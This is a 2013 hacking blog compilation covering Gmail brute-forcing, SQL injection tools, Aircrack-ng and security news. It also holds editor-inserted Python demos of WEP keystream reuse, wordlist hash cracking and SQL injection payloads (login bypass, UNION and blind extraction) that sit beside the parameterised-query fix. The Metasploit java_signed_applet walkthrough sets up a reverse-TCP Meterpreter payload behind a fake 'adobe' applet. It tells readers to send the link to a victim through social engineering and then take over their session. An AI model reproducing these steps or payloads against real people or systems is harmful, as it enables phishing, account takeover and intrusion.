Saturday, May 18, 2013

BRUTEFORCE GMAIL PASSWORD WITH BACKTRACK 5 R3


Brute force is often described as the easiest way to attack a Gmail account password, which is why so many queries on the web ask for a working brute-forcer. In this tutorial I will show you how to brute-force a Gmail password with THC Hydra on BackTrack 5 R3. Bear in mind that this is an online attack: every guess is a login attempt against Google's servers, which rate-limit and can lock the account, so a large wordlist is rarely practical against a live Gmail login.


MAKE YOUR WORDLIST


SQL POIZON - SQLI EXPLOIT SCANNER TOOL



SQL Poizon includes PHP, ASP, RFI and LFI dorks. With it you can find vulnerable sites (for example SQL-injectable sites), filter them by country, attack the SQL-vulnerable sites and browse them from within the tool.

DOWNLOAD SQL Poizon here


NMAP (NETWORK MAPPER)

Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich) [1] used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyses the responses. Unlike many simple port scanners that just send packets at some predefined constant rate, Nmap accounts for the network conditions (latency fluctuations, network congestion, the target's interference with the scan) during the run. Also, owing to the large and active user community providing feedback and contributing to its features, Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a host is up or down and which ports are open and closed; it can determine the operating system of the target, the names and versions of the listening services, estimated uptime, type of device, and the presence of a firewall. All of this can be written as XML with -oX, which is the form to use when the results feed other tooling.


W3AF WEB SCANNER


w3af is an open-source web application security scanner. The project provides a vulnerability scanner and exploitation tool for web applications. It provides information about security vulnerabilities and aids penetration testing efforts.

This cross-platform tool is available on all of the popular operating systems, including Microsoft Windows, Linux, Mac OS X, FreeBSD and OpenBSD, and is written in the Python programming language. Users can choose between a graphical user interface and a command-line interface.

w3af identifies most web application vulnerabilities using more than 130 plug-ins. After identification, vulnerabilities such as (blind) SQL injection, OS commanding, remote file inclusion (PHP), cross-site scripting (XSS) and unsafe file uploads can be exploited to gain different types of access to the remote system.

WEBSPLOIT

WebSploit is an open-source project for scanning and analysing remote systems for vulnerabilities. Its modules:

[+] Autopwn - uses Metasploit to scan and exploit target services
[+] wmap - scans and crawls the target using Metasploit's wmap plugin
[+] format infector - injects a reverse or bind payload into a file format
[+] phpmyadmin - searches for the target's phpMyAdmin login page
[+] lfi - scans for and exploits local file inclusion vulnerabilities, with bypasses for some WAFs
[+] apache users - searches for user directories on the server (if it runs Apache)
[+] Dir Bruter - brute-forces target directories with a wordlist
[+] admin finder - searches for the target's admin and login pages
[+] MLITM Attack - Man Left In The Middle, XSS phishing attacks
[+] MITM - Man In The Middle attack
[+] Java Applet Attack - Java signed applet attack
[+] MFOD Attack Vector - Middle Finger Of Doom attack vector
[+] USB Infection Attack - creates an executable backdoor to infect USB drives on Windows

DOWNLOAD LINK: http://adf.ly/Ni5sA

PROXYSTRIKE

One tool that I find useful for detecting SQL injection flaws is ProxyStrike. ProxyStrike is a proxy/scanner that looks for SQL injection and XSS vulnerabilities. From the ProxyStrike documentation:

TUTORIAL FOR THIS: http://www.youtube.com/watch?v=2fdfE6uELkg

TOR PROXY


Vidalia is a cross-platform graphical controller for the Tor software, built using the Qt framework. Vidalia runs on most platforms supported by Qt 4.3 or later, including Microsoft Windows, Apple OS X, and Linux or other Unix variants using the X11 window system. It was originally written by Matt Edman, and is currently maintained by Tomás Touceda.

Vidalia lets you start and stop Tor, see how much bandwidth you are consuming, see how many circuits you currently have active, see where these circuits are connected on a global map, view messages from Tor about its progress and current state, and configure your Tor client, bridge, or relay with a simple interface. Included in Vidalia is an extensive help system which helps you understand all of the options available to you. All of these features are translated into a large number of languages.


JAVA SIGNED APPLET EXPLOIT


This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM pops a dialog asking whether they trust the signed applet. On older versions the dialog displays the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it is not signed by a trusted CA). The SigningCert option lets you provide a trusted code-signing cert, whose values override CERTCN. If SigningCert is not given, a randomly generated self-signed cert is used. Either way, once the user clicks "Run", the applet executes with full user permissions.

Open a BackTrack terminal and type msfconsole. Then load the module and set its options. The reverse_tcp payload also needs LHOST (the address it connects back to); the original walkthrough omits it, so it is set here to the same address as SRVHOST:

msf > use exploit/multi/browser/java_signed_applet

msf exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(java_signed_applet) > set APPLETNAME adobe (the main applet's class name)

msf exploit(java_signed_applet) > set CERTCN "adobe player" (the CN shown in the self-signed certificate)

msf exploit(java_signed_applet) > set SRVHOST 192.168.1.4 (this must be an address on the local machine)

msf exploit(java_signed_applet) > set SRVPORT 80 (the local port to listen on; default: 8080)

msf exploit(java_signed_applet) > set URIPATH adobevideos (the URL path to use for this exploit)

msf exploit(java_signed_applet) > set LHOST 192.168.1.4 (the address the payload connects back to)

msf exploit(java_signed_applet) > set LPORT 443

msf exploit(java_signed_applet) > exploit

The URL you should give to your victim is now http://192.168.1.4/adobevideos

Send the link to the victim via chat, email or any other social engineering technique.
When the victim opens that link in their browser, it immediately shows a dialog warning that the digital signature cannot be verified, like the picture below. Nothing runs until the victim clicks "Run" in that dialog.

Once they do, you have a Meterpreter session on the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to interact with it.

VIDEO TUTORIAL: http://adf.ly/OUZOp


HACKING WEP KEY WITH AIRCRACK-NG

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. The program runs under Linux and Windows.

DOWNLOAD Aircrack-ng: http://adf.ly/P96Gx

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognisable by its key of 10 or 26 hexadecimal digits (a 40-bit WEP-40 or 104-bit WEP-104 key), is still widely in use and is often the first security choice presented to users by router configuration tools.

Although its name implies that it is as secure as a wired connection, WEP has been demonstrated to have numerous flaws and has been deprecated in favour of newer standards such as WPA2. The root of the problem is that each frame is encrypted with RC4 under a per-packet key formed from a 24-bit initialisation vector (sent in the clear) and the shared key; the IV space is small enough that IVs repeat on a busy network, and repeated IVs mean repeated keystream. In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA). In 2004, with the ratification of the full 802.11i standard (i.e. WPA2), the IEEE declared that both WEP-40 and WEP-104 "have been deprecated as they fail to meet their security goals".
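An added example, not part of the original post or the Aircrack-ng suite: the Python below shows the core of why WEP fails. WEP encrypts each frame with RC4 under a per-packet key made of the 24-bit IV (sent in the clear) followed by the 40- or 104-bit shared key, so any two frames that reuse an IV are encrypted under the same keystream. Since every data frame begins with the same LLC/SNAP header (AA AA 03 00 00 00 followed by the EtherType), the first bytes of keystream are always known even without a second frame. The CRC-32 integrity check (ICV) is left out, and the key and frames are constructed for the demo.

```python
def rc4(key, data):
    """Plain RC4: key scheduling (KSA) then the keystream generator (PRGA).
    Returns data XOR keystream, so the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_key_from_hex(hex_key):
    """WEP-40 keys are 10 hex digits (5 bytes); WEP-104 keys are 26 hex digits (13 bytes)."""
    if len(hex_key) not in (10, 26):
        raise ValueError("WEP key must be 10 or 26 hex digits")
    return bytes.fromhex(hex_key)


def wep_encrypt(key, iv, plaintext):
    """Per-packet RC4 key = 3-byte IV || shared key. The IV is transmitted in the
    clear in front of the ciphertext, so an eavesdropper sees which frames share one."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + key, plaintext)


def wep_decrypt(key, frame):
    iv, body = frame[:3], frame[3:]
    return rc4(iv + key, body)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Every 802.11 data frame starts with this LLC/SNAP header; 0x0800 = IPv4.
# That hands the attacker 8 bytes of known plaintext, hence 8 keystream bytes, per IV.
SNAP_IPV4 = bytes.fromhex("aaaa030000000800")


def keystream_from_known_plaintext(frame, known_prefix):
    """keystream = ciphertext XOR plaintext, for as many bytes as are known."""
    return xor_bytes(frame[3:], known_prefix)


def recover_with_reused_iv(frame_known, known_plaintext, frame_target):
    """Two frames with the same IV share a keystream, so P2 = C2 XOR (C1 XOR P1).
    Returns None when the IVs differ (no shared keystream to exploit)."""
    if frame_known[:3] != frame_target[:3]:
        return None
    keystream = keystream_from_known_plaintext(frame_known, known_plaintext)
    return xor_bytes(frame_target[3:], keystream)


def iv_collisions(frames):
    """Group captured frames by IV; every group with more than one frame is attackable."""
    by_iv = {}
    for f in frames:
        by_iv.setdefault(f[:3], []).append(f)
    return {iv: fs for iv, fs in by_iv.items() if len(fs) > 1}


if __name__ == "__main__":
    key = wep_key_from_hex("0123456789")           # constructed WEP-40 key
    iv = b"\x01\x02\x03"
    p1 = SNAP_IPV4 + b"GET / HTTP/1.0\r\n"
    p2 = SNAP_IPV4 + b"password=hunter2"
    c1 = wep_encrypt(key, iv, p1)
    c2 = wep_encrypt(key, iv, p2)                  # same IV: the station reused it
    print(recover_with_reused_iv(c1, p1, c2))      # second frame's plaintext, no key needed
    print(keystream_from_known_plaintext(c2, SNAP_IPV4).hex())  # keystream from the SNAP header alone
```

With only 2^24 IVs and many drivers choosing them sequentially or at random, a busy network exhausts the IV space in hours; aircrack-ng's statistical attacks go further and recover the shared key itself from a few tens of thousands of captured IVs, but the keystream reuse shown here is the simplest way to see that the design is broken regardless of key length.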

VIDEO TUTORIAL:  http://adf.ly/P93y8 

 TEXT TUTORIAL:     http://adf.ly/P95DQ


DARK JUMPER


Darkjumper is a free tool that tries to find every website hosted on the same server as your target, then checks each of those websites for vulnerabilities.

· scans for SQL injection, RFI, LFI and blind SQL injection
· auto SQL injector
· proxy support
· verbosity
· auto FTP brute-forcer
· IP or proxy checker and GeoIP

DOWNLOAD LINK: http://adf.ly/O9IYL

BACKTRACK BASIC COMMANDS YOU MUST KNOW

File Operations

pwd                 Print name of the current/working directory
cd                  Change the working directory
cp                  Copy files or directories
rm                  Remove files or directories
ls                  List directory contents
mkdir               Make directories
cat                 Concatenate files and print on standard output
mv                  Move (rename) files
chmod               Change file permissions

Know Your System

uname               Print system information
who                 Show who is logged on
cal                 Display a calendar
date                Print or set the system date and time
df                  Report file system disk space usage
du                  Estimate file space usage
ps                  Report a snapshot of the current processes
kill                Send a signal to a process (by default, terminate it)
clear               Clear the terminal screen
cat /proc/cpuinfo   Display CPU information
cat /proc/meminfo   Display memory information

Compression

tar                 Store and extract files from an archive file known as a tar file
gzip                Compress or decompress named files

Network

ifconfig            Configure a network interface
ping                Check whether another system is reachable from the host
wget                Download files from the network
ssh                 Remote login program (encrypted)
ftp                 Download/upload files from/to a remote system (unencrypted; prefer scp/sftp)
last                Display a list of last logged-in users
telnet              Communicate with another host using the Telnet protocol (unencrypted)

Searching Files

grep                Search file(s) for specific text
find                Search for files in a directory hierarchy
locate              Find files by name

TUTORIAL FOR MORE COMMANDS: http://adf.ly/P0xkG


Netool.sh V2.4 Released


New modules:
  • webcrawler.py
  • Aggressive Directory Scanner
  • Fast Directory Scanner
  • Admin Page Finder
  • WebShell.php Scanner
  • File Upload Scanner
[nmap]
Scan a List.txt of targets

Description of the script:
netool.sh is a bash script that automates frameworks like Nmap, Driftnet, SSLstrip and ettercap MITM attacks. It retrieves metadata and the geo-location of a target; changes the hostname and changes the IP and MAC address to decoy scans; searches for the admin login page of a target website, for directories inside the target website and for webshell.php files planted on the website, and scans for common URL file-upload vulnerabilities; captures pictures of the target machine's web browsing; performs TCP/UDP packet manipulation using etter.filters; runs DoS attacks against the local/external network; and uses Metasploit [msfpayload+msfencode+msfcli] to gain control of the target machine ...

Home project:  http://adf.ly/OPMs5

See WIKI : http://adf.ly/OPMmr

DOWNLOAD LINK: http://adf.ly/OPMaR

Enjoy, and safe hacking ...


BIGGEST PASSWORD CRACKING WORDLIST WITH MILLIONS OF WORDS


One of the biggest and most comprehensive password-cracking wordlists, containing 1,493,677,782 words, has been released for download. The wordlist is intended primarily for use with password crackers such as hashcat and John the Ripper, and with password recovery utilities.
Defuse Security has released the 4.2 GiB (compressed) / 15 GiB (uncompressed) wordlist used by their CrackStation project.
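As an added example (not from CrackStation or the original post), the Python below shows what a cracker does with such a list: stream it line by line (a 15 GiB file must never be loaded into memory), expand each base word through a few mangling rules of the kind hashcat and John the Ripper apply, and compare the hash of every candidate with the target. It also serves the MAKE YOUR WORDLIST section above, since rule expansion is how a short list of base words becomes a usable wordlist. The hash layout (hex of algorithm(salt || password)) and the five-word sample list are assumptions for the demo.

```python
import hashlib
import os
import tempfile

LEET = str.maketrans("aeios", "43105")
SUFFIXES = [""] + [str(n) for n in range(10)] + ["!", "123", "2013", "1!"]


def mangle(word):
    """Yield variants of a base word: case changes, leetspeak, common suffixes.
    A tiny stand-in for the rule engines in hashcat and John the Ripper."""
    forms = [word, word.lower(), word.capitalize(), word.upper()]
    forms += [w.translate(LEET) for w in forms]
    seen = set()
    for form in forms:
        for suffix in SUFFIXES:
            candidate = form + suffix
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def hash_password(salt, password, algorithm="sha256"):
    """Assumed target layout: hex(algorithm(salt || password)). Real applications vary."""
    return hashlib.new(algorithm, salt + password.encode("utf-8")).hexdigest()


def iter_wordlist(path):
    """Stream the list one line at a time so a 15 GiB file never has to fit in RAM."""
    with open(path, "rb") as fh:
        for line in fh:
            word = line.rstrip(b"\r\n").decode("utf-8", "ignore")
            if word:
                yield word


def crack(target_hex, salt, path, algorithm="sha256", use_rules=True):
    """Return (password, candidates_tried); password is None if nothing matched."""
    target = bytes.fromhex(target_hex)
    tried = 0
    for word in iter_wordlist(path):
        candidates = mangle(word) if use_rules else (word,)
        for candidate in candidates:
            tried += 1
            digest = hashlib.new(algorithm, salt + candidate.encode("utf-8")).digest()
            if digest == target:
                return candidate, tried
    return None, tried


def write_sample_wordlist():
    """Constructed five-word list for the demo (the real list has over a billion lines)."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "wb") as fh:
        fh.write(b"letmein\nmonkey\nsummer\npassword\ndragon\n")
    return path


if __name__ == "__main__":
    path = write_sample_wordlist()
    salt = b"s4lt"
    target = hash_password(salt, "Summer2013")        # what a leaked database row would hold
    print(crack(target, salt, path, use_rules=False))  # (None, 5): not in the list as-is
    print(crack(target, salt, path))                   # ('Summer2013', n): found through the rules
    os.remove(path)
```

Point crack() at the CrackStation file and a real hash format and it will run for a long time: the whole point of the exercise is that candidate count, not wordlist size, decides cost, which is also why slow, salted hashes (bcrypt, scrypt) are the defence on the other side.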



SQL INJECTION



SQL injection is a technique often used to attack databases through a website. It works by including fragments of SQL syntax in a web form entry field in an attempt to make the website pass a newly formed rogue SQL command to the database (e.g. to dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in a website's software: the vulnerability arises when user input is incorrectly filtered for string-literal escape characters embedded in SQL statements, or when user input is not strongly typed and is unexpectedly executed. SQL commands are thus injected from the web form into the application's database (like queries) to change the database contents or to dump information such as credit card numbers or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used against any application that builds SQL statements from untrusted input. The reliable fix is to pass user input to the database as bound parameters (prepared statements) instead of pasting it into the SQL text.

THE MOLE AUTOMATED SQL INJECTION TOOL


The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string on the site, it can detect the injection and exploit it, either with the union technique or with a boolean-query-based technique. The Mole uses a command-based interface that lets the user indicate the action to perform easily. The CLI also provides auto-completion for both commands and command arguments, so the user has to type as little as possible.
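An added example, not taken from The Mole or the original post: the Python below uses the standard-library sqlite3 module as a stand-in for a web application's database and shows the vulnerable query, the parameterised fix, and the two extraction techniques The Mole automates: a UNION injection, and a boolean-based blind injection that recovers a column one character at a time with a binary search over code points. All table data, names and payloads are constructed for the demo.

```python
import sqlite3


def make_db():
    """In-memory SQLite database standing in for a web application's backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cr3t-Pa55"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The bug: user input is pasted into the SQL text, so quotes in it change the query's grammar."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: a parameterised query. Input is bound as data and can never become SQL."""
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


# --- attacks that work against login_vulnerable only -------------------------

def auth_bypass(conn):
    # Resulting SQL: ... WHERE username = 'admin' -- ' AND password = 'wrong'
    # Everything after "--" is a comment, so the password check disappears.
    return login_vulnerable(conn, "admin' -- ", "wrong")


def union_dump_admin_password(conn):
    # The UNION appends a second SELECT whose column is echoed where username would be.
    payload = "x' UNION SELECT password FROM users WHERE username = 'admin' -- "
    return login_vulnerable(conn, payload, "wrong")


def boolean_oracle(conn, condition):
    """Blind injection: the page never shows data, it only differs when `condition` holds."""
    return login_vulnerable(conn, "admin' AND (%s) -- " % condition, "wrong") == "admin"


def blind_int(oracle, expr, lo, hi):
    """Binary-search the integer value of SQL expression `expr`, known to lie in [lo, hi)."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle("%s >= %d" % (expr, mid)):
            lo = mid
        else:
            hi = mid
    return lo


def blind_extract(conn, column="password", where="username = 'admin'"):
    """Recover a string with about 8 yes/no queries per character. Comparing code points
    via unicode() keeps quotes and the character set out of the payload entirely."""
    oracle = lambda cond: boolean_oracle(conn, cond)
    sub = "(SELECT %s FROM users WHERE %s)" % (column, where)
    length = blind_int(oracle, "length(%s)" % sub, 0, 64)
    return "".join(chr(blind_int(oracle, "unicode(substr(%s, %d, 1))" % (sub, pos), 0, 128))
                   for pos in range(1, length + 1))


if __name__ == "__main__":
    conn = make_db()
    print("bypass:", auth_bypass(conn))                        # admin
    print("union:", union_dump_admin_password(conn))           # s3cr3t-Pa55
    print("blind:", blind_extract(conn))                       # s3cr3t-Pa55, no data ever echoed
    print("safe:", login_safe(conn, "admin' -- ", "wrong"))    # None: the payload is just a string
```

The three attack functions all target the same one-line defect, and none of them works against login_safe, which is the whole case for prepared statements; tools like The Mole differ from blind_extract only in automating the detection of which technique the target supports and in tuning the oracle (response text, status code or timing) for a real HTTP application.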


SAFE3SI



Safe3SI is one of the most powerful and easiest-to-use penetration testing tools for automating the detection and exploitation of SQL injection flaws and taking over database servers. It comes with a strong detection engine, many niche features for the penetration tester, and a broad range of switches ranging from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

DOWNLOAD LINK: http://adf.ly/Nk6UZ

BSQL HACKER _by SHINE SREEDHAR


BSQL (Blind SQL) Hacker is an automated SQL injection framework/tool designed to exploit SQL injection vulnerabilities in virtually any database.

DOWNLOAD LINK: http://adf.ly/NlRBz


PANGOLIN - SQL INJECTION TOOL-post by_ shine sreedhar




Pangolin is an automatic SQL injection penetration testing tool developed by NOSEC. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive back-end database management system fingerprint, retrieve the DBMS session user and database, enumerate users, password hashes, privileges and databases, dump entire or user-specified DBMS tables/columns, run their own SQL statements, read specific files on the file system, and more.

Database Support:

* Access: Information (Database Path; Root Path; Drivers); Data
* MSSQL: Information; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
* MySQL: Information; Data; FileReader; FileWriter
* Oracle: Information (Version; IP; Database; Accounts); Data
* Informix: Information; Data
* DB2: Information; Data; and more
* Sybase: Information; Data; and more
* PostgreSQL: Information; Data; FileReader
* SQLite: Information; Data

GFI LanGuard 2012 One Solution For Vulnerability Scanning, Patch Management, Network & Software Auditing



As security researchers continue to identify new, sophisticated malware threats, vulnerability and patch management are more critical than ever as a key component of a layered security approach. To address those challenges, GFI Software announced the availability of GFI LanGuard 2012, which the manufacturer claims gives network and system administrators the ability to manage 100 percent of their patching needs through a single, intuitive and easy-to-use interface, without the need for other update tools. So let's take a look at this product from GFI Software.

Enhanced features of GFI LanGuard 2012 include:
·         Comprehensive Patch Management – Administrators can now manage 100 percent of their patching needs – both security and non-security updates – from a centralised console. No other update tools are necessary.
·         Strong Vulnerability Assessment for Network Devices – Network devices such as printers, routers and switches from manufacturers such as HP and Cisco can now be detected and scanned for vulnerabilities. GFI LanGuard 2012 performs over 50,000 checks against operating systems, installed applications and device firmware for security flaws and misconfigurations. It also runs network audits that now detect mobile devices running iOS and Android.
·         Improved Scan and Remediation Performance – New relay agents receive patches and definition files directly from the GFI LanGuard server and distribute them as appropriate, helping IT staff save time, manage network bandwidth and increase the number of devices that can be accommodated. This is particularly effective in multi-site and large networks.
GFI LanGuard 2012 combines vulnerability scanning, patch management, and network and software auditing into one solution that enables IT professionals to scan, detect, assess and correct potential security risks on their networks with minimal administrative effort. GFI LanGuard also enables administrators to inventory devices attached to their networks; receive change alerts, such as a notification when a new application is installed; ensure antivirus applications are current and enabled; and strengthen compliance with industry regulations through automated patch management. With GFI LanGuard, IT administrators can manage more than 2,500 machines from a single console; it integrates with more than 1,500 security applications and includes keyword search functionality.


After going through the brief description above, many readers will want to try this product; GFI LanGuard 2012 is one of the finest tools released in this domain. Detailed information on LanGuard 2012 can be found here, and a 30-day trial of GFI LanGuard 2012 is available for download.

Wednesday, May 15, 2013

WordPress.com boosts security with Two Step authentication




WordPress.com, the blog hosting service, has announced that it has enabled a two-step authentication feature to keep your WordPress.com account secure.

Two-step authentication is a security feature that prompts you to enter a temporary code sent to your phone whenever you log in to your account, so a stolen password alone is no longer enough to get in.

How to enable two-step authentication on WordPress.com?
To enable this feature, go to the new Security tab in your WordPress.com account settings and go through the setup wizard.

"We know your blog is important to you, and today we’re proud to announce Two Step Authentication: an optional new feature to help you keep your WordPress.com account secure." the WordPress.com blog post reads.

Chrome and Firefox Browser Extensions hijack facebook accounts


Security researchers from Microsoft warn of a new Trojan, packaged as a Mozilla Firefox add-on and a Google Chrome extension, that can hijack your Facebook profile.

The threat was first discovered in Brazil; Microsoft detects it as "Trojan:JS/Febipos.A".

The Trojan checks whether the user is logged in to Facebook, then attempts to download a configuration file that includes a list of commands.

According to the Malware Protection Center report, the malware is capable of doing the following with your Facebook account: like a page, share, post, join a group, invite friends to a group, chat with friends, and comment on a post.

" There may be more to this threat because it can change its messages, URLs, Facebook pages and other activity at any time."Microsoft concluded. "In any case, we recommend you always keep your security products updated with the latest definitions to help avoid infection. "



Mozilla Firefox 21 closes three critical security holes

Mozilla has released Firefox 21, which closes eight security vulnerabilities, including three rated critical and four rated high.

Critical vulnerabilities: memory corruption found using Address Sanitizer (MFSA 2013-48), use-after-free with video and onresize event (MFSA 2013-46), miscellaneous memory safety hazards (MFSA 2013-41).

High-severity vulnerabilities: uninitialized functions in DOMSVGZoomEvent (MFSA 2013-47), Mozilla Updater fails to update some Windows Registry entries (MFSA 2013-45), local privilege escalation through Mozilla Maintenance Service (MFSA 2013-44), privileged access for content-level constructor (MFSA 2013-42).

Firefox 21 introduces new feature Social API that "makes it easy for your favorite social providers to add a sidebar with your content to Firefox or notification buttons directly on the Firefox toolbar."

It also introduces Health report that "logs basic health information about your browser and then give you tools to understand that information and fix any problems you encounter". 

Users are advised to upgrade Firefox as soon as possible; you can check your version and update the browser from Help -> About Firefox.


Dorkbot malware spy on Facebook users' browser activities

Security researchers from Bitdefender Labs have spotted a new variant of the Dorkbot malware that targets Facebook users, spreading through the social network's internal chat.


Dorkbot is an IRC-based worm that spreads via instant-messaging programs and social networks; it can steal login credentials and block security updates.

The malware was uploaded with a '.JPG' extension to the file-sharing website MediaFire. Once the malware has compromised a victim's system, it sends links to itself to the victim's friends via the chat service, according to a Computerworld report.

Researchers said the malware is capable of spying on users' browsing activity and stealing their personal details. Bitdefender found links to the malware circulating in the United States, India, Portugal, the UK, Germany, Turkey and Romania.


Tuesday, May 14, 2013

'Kali Linux' The Most Advanced & Stable Penetration Testing Distribution



Fans of the world-famous penetration testing distribution BackTrack can now taste another flavour: the developers behind BackTrack and Offensive Security have introduced a new Linux distribution aimed at enterprise security, offering a suite of tools for rigorous testing, and called it "Kali Linux". In the official release note Offensive Security claims that Kali Linux is the most advanced, robust and stable penetration testing distribution to date, and that it is the product of seven years of knowledge and experience, which makes Kali Linux the "next generation" penetration testing distribution. Now let's look at the main features of Kali Linux at a glance:

Kali Linux Features:-

Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.
  • More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality.
  • Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux.
  • Open source Git tree: We are huge proponents of open source software and our development tree is available for all to see and all sources are available for those who wish to tweak and rebuild packages.
  • FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc.
  • Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.
  • Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments so our kernel has the latest injection patches included.
  • Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols.
  • GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed and the repositories subsequently sign the packages as well.
  • Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.
  • Completely customizable: We completely understand that not everyone will agree with our design decisions so we have made it as easy as possible for our more adventurous users to customize Kali Linux to their liking, all the way down to the kernel.
  • ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of the distribution. Kali is currently available for the following ARM devices:
Kali is specifically tailored to penetration testing and therefore all documentation on the Kali site assumes prior knowledge of the Linux operating system. For more information, visit the official website of Kali Linux.

To download Kali Linux (.iso, VMware image, Samsung Chromebook ARM, Odroid U2, Raspberry Pi & rk3306 mk/ss808): Click Here